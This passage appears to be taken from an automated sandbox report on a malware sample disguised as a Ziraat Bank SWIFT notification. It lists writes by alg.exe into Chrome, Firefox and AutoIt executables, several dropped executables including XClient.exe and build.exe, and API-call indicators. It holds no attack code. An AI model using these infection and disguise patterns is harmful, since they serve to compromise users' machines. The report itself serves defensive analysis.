Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\notification_helper.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\notification_helper.exe offset: 1665536	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\notification_helper.exe offset: 2239052	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\notification_helper.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\notification_helper.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\notification_helper.exe offset: 2238976	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\notification_helper.exe offset: 853340	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\notification_helper.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\os_update_handler.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\os_update_handler.exe offset: 1861120	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\os_update_handler.exe offset: 2434636	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\os_update_handler.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\os_update_handler.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\os_update_handler.exe offset: 2434560	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\os_update_handler.exe offset: 910188	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\os_update_handler.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe offset: 1445888	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe offset: 2019404	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe offset: 2019328	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe offset: 728892	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe offset: 248832	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe offset: 822348	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe offset: 822272	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe offset: 121980	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe offset: 707072	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe offset: 1280588	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe offset: 1280512	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe offset: 346881	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe offset: 666112	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe offset: 1239628	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe offset: 1239552	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe offset: 193089	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe offset: 228352	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe offset: 801868	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe offset: 801792	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe offset: 43297	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe offset: 762368	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe offset: 1335884	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe offset: 1335808	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe offset: 239297	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe offset: 70144	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe offset: 643660	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe offset: 643584	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe offset: 32241	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe offset: 279040	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe offset: 852556	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe offset: 852480	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe offset: 111633	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe offset: 55296	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe offset: 628812	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe offset: 628736	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe offset: 4108	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe offset: 403968	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe offset: 977484	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe offset: 977408	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe offset: 79009	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\AutoIt3\Au3Check.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\AutoIt3\Au3Check.exe offset: 224256	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\AutoIt3\Au3Check.exe offset: 797772	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\AutoIt3\Au3Check.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\AutoIt3\Au3Check.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\AutoIt3\Au3Check.exe offset: 797696	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\AutoIt3\Au3Check.exe offset: 35826	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\AutoIt3\Au3Check.exe offset: 0	Jump to behavior

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_004048D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_004048D7
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00485376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_00485376

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Code function: 0_2_00423187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00423187

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
